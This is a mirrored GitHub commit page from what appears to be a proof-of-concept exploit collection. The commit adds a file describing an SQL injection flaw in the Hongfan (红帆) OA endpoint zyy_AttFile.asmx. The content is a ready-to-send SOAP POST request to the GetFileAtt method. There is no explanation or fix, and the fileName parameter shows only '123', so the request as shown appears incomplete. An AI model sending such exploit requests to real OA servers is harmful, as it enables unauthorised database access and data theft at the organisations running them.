mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-18 02:24:51 +08:00
Create 红帆OA zyy_AttFile.asmx SQL注入漏洞.md
This commit is contained in:
parent
68f1635050
commit
df07d7229b
18
红帆OA zyy_AttFile.asmx SQL注入漏洞.md
Normal file
18
红帆OA zyy_AttFile.asmx SQL注入漏洞.md
Normal file
@ -0,0 +1,18 @@
|
||||
## 红帆OA zyy_AttFile.asmx SQL注入漏洞
|
||||
```
|
||||
POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
|
||||
Host: 10.250.250.5
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
|
||||
like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
Content-Length: 383
|
||||
Content-Type: text/xml; charset=utf-8
|
||||
Soapaction: "http://tempuri.org/GetFileAtt"
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
<?xml version="1.0" encoding="utf-8"?><soap:Envelope
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
||||
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
|
||||
xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
|
||||
ap:Envelope>
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user